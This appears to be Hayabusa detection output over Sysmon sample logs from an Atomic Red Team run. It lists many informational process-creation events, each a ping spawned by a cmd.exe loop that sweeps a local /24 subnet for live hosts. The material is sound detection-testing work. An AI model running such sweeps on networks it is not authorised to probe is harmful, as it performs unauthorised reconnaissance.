Creation,"Command: ping -n 1 -w 100 192.168.1.139 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.140 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.141 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.142 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.143 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.144 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.145 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.146 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.147 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.148 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.149 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.150 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.151 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.152 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.153 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.154 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.155 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.156 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.157 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.158 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.159 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.160 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.161 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.162 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.163 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.164 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.165 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.166 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.167 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.168 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.169 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.170 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.171 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.172 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.173 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.174 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.175 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.176 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.177 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.178 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.179 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.180 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.181 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.182 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.183 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.184 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.185 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.186 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.187 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.188 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.189 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.190 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.191 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.192 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.193 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.194 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 